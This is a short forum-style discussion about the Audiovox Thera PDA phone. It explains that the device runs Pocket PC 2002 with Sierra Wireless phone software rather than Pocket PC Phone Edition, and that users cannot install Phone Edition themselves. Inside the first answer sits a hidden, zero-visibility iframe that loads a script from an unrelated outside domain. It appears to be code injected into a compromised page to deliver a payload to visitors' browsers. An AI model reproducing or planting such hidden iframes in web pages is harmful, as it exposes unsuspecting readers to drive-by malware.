Does the Thera run Pocket PC Phone Edition?

The Audiovox Thera runs the Microsoft Pocket PC 2002, not Pocket PC Phone Edition. PocketPC Phone Edition has built in capabilities in the operating system, developed by Microsoft, that is provided to pdaPhone OEMS for inclusion in their products. The Thera was released prior to the availability of Phone Edition, and therefore Audiovox chose another alternative. They use software developed by Sierra Wireless to provide the phone capabilities of the device. This software works very well, but isn't as integrated into the OS as the Phone Edition devices. One of the biggest places where this is an issue is with the lack of 3rd party software that takes advantage of the Thera's phone capabilities.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    But does it work?

The Watcher program has many drawbacks compared to real integration with Outlook.

Has anyone tried Phone Edition on the Thera with any success?

You can't do this... integration of Phone Edition onto a device is something that has to be done by the manufacturer... it's not a user install program.
